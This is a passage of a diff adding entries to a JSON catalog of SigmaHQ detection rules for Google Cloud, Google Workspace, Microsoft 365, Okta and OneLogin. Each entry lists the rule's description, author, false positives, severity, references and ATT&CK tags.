"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", + "value": "Google Cloud SQL Database Modified or Deleted" + }, + { + "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "VPN Tunnel being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", + "value": "Google Cloud VPN Tunnel Modified or Deleted" + }, + { + "description": "Detects when an an application is removed from Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/26", + "falsepositive": [ + "Application being removed may be performed by a System Administrator." + ], + "filename": "gworkspace_application_removed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", + "value": "Google Workspace Application Removed" + }, + { + "description": "Detects when an API access service account is granted domain authority.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_granted_domain_api_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", + "value": "Google Workspace Granted Domain API Access" + }, + { + "description": "Detects when multi-factor authentication (MFA) is disabled.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/26", + "falsepositive": [ + "MFA may be disabled and performed by a system administrator." + ], + "filename": "gworkspace_mfa_disabled.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", + "value": "Google Workspace MFA Disabled" + }, + { + "description": "Detects when an a role is modified or deleted in Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_role_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", + "value": "Google Workspace Role Modified or Deleted" + }, + { + "description": "Detects when an a role privilege is deleted in Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_role_privilege_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", + "value": "Google Workspace Role Privilege Deleted" + }, + { + "description": "Detects when an Google Workspace user is granted admin privileges.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/23", + "falsepositive": [ + "Google Workspace admin role privileges, may be modified by system administrators." + ], + "filename": "gworkspace_user_granted_admin_privileges.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", + "value": "Google Workspace User Granted Admin Privileges" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_activity_by_terminated_user.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", + "value": "Activity Performed by Terminated User" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "User using a VPN or Proxy" + ], + "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", + "value": "Activity from Anonymous IP Addresses" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_activity_from_infrequent_country.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "0f2468a2-5055-4212-a368-7321198ee706", + "value": "Activity from Infrequent Country" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", + "value": "Data Exfiltration to Unsanctioned Apps" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_from_susp_ip_addresses.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", + "value": "Activity from Suspicious IP Addresses" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2020/07/06", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_impossible_travel_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", + "value": "Microsoft 365 - Impossible Travel Activity" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_logon_from_risky_ip_address.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", + "value": "Logon from a Risky IP Address" + }, + { + "description": "Alert for the addition of a new federated domain.", + "meta": { + "author": "@ionsor", + "creation_date": "2022/02/08", + "falsepositive": [ + "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." + ], + "filename": "microsoft365_new_federated_domain_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://www.sygnia.co/golden-saml-advisory", + "https://o365blog.com/post/aadbackdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.003" + ] + }, + "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", + "value": "New Federated Domain Added" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_potential_ransomware_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", + "value": "Microsoft 365 - Potential Ransomware Activity" + }, + { + "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", + "meta": { + "author": "Sorina Ionescu", + "creation_date": "2022/02/08", + "falsepositive": [ + "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." + ], + "filename": "microsoft365_pst_export_alert.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", + "value": "PST Export Alert Using eDiscovery Alert" + }, + { + "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", + "meta": { + "author": "Nikita Khalimonenkov", + "creation_date": "2022/11/17", + "falsepositive": [ + "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." + ], + "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "6897cd82-6664-11ed-9022-0242ac120002", + "value": "PST Export Alert Using New-ComplianceSearchAction" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_susp_inbox_forwarding.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", + "value": "Suspicious Inbox Forwarding" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", + "value": "Suspicious OAuth App File Download Activities" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_unusual_volume_of_file_deletion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", + "value": "Microsoft 365 - Unusual Volume of File Deletion" + }, + { + "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_user_restricted_from_sending_email.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1199" + ] + }, + "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", + "value": "Microsoft 365 - User Restricted from Sending Email" + }, + { + "description": "Detects when an the Administrator role is assigned to an user or group.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Administrator roles could be assigned to users or group by other admin users." + ], + "filename": "okta_admin_role_assigned_to_user_or_group.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "413d4a81-6c98-4479-9863-014785fd579c", + "value": "Okta Admin Role Assigned to an User or Group" + }, + { + "description": "Detects when a API token is created", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_api_token_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", + "value": "Okta API Token Created" + }, + { + "description": "Detects when a API Token is revoked.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_api_token_revoked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", + "value": "Okta API Token Revoked" + }, + { + "description": "Detects when an application is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_application_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", + "value": "Okta Application Modified or Deleted" + }, + { + "description": "Detects when an application Sign-on Policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", + "value": "Okta Application Sign-On Policy Modified or Deleted" + }, + { + "description": "Detects when an attempt at deactivating or resetting MFA.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/21", + "falsepositive": [ + "If a MFA reset or deactivated was performed by a system administrator." + ], + "filename": "okta_mfa_reset_or_deactivated.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", + "value": "Okta MFA Reset or Deactivated" + }, + { + "description": "Detects when an Network Zone is Deactivated or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_network_zone_deactivated_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", + "value": "Okta Network Zone Deactivated or Deleted" + }, + { + "description": "Detects when an Okta policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Okta Policies being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "okta_policy_modified_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "1667a172-ed4c-463c-9969-efd92195319a", + "value": "Okta Policy Modified or Deleted" + }, + { + "description": "Detects when an Policy Rule is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_policy_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", + "value": "Okta Policy Rule Modified or Deleted" + }, + { + "description": "Detects when an security threat is detected in Okta.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_security_threat_detected.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" + ], + "tags": "No established tags" + }, + "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", + "value": "Okta Security Threat Detected" + }, + { + "description": "Detects when unauthorized access to app occurs.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "User might of believe that they had access." + ], + "filename": "okta_unauthorized_access_to_app.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", + "value": "Okta Unauthorized Access to App" + }, + { + "description": "Detects when an user account is locked out.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_user_account_locked_out.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", + "value": "Okta User Account Locked Out" + }, + { + "description": "Detects when an user assumed another user account.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "onelogin_assumed_another_user.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "onelogin", + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", + "value": "OneLogin User Assumed Another User" + }, + { + "description": "Detects when an user account is locked or suspended.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "System may lock or suspend user accounts." + ], + "filename": "onelogin_user_account_locked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "onelogin", + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", + "value": "OneLogin User Account Locked" + }, + { + "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "default_credentials_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "qualys", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" + ], + "tags": "No established tags" + }, + "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", + "value": "Default Credentials Usage" + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "firewall_cleartext_protocols.yml", + "level": "low", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + 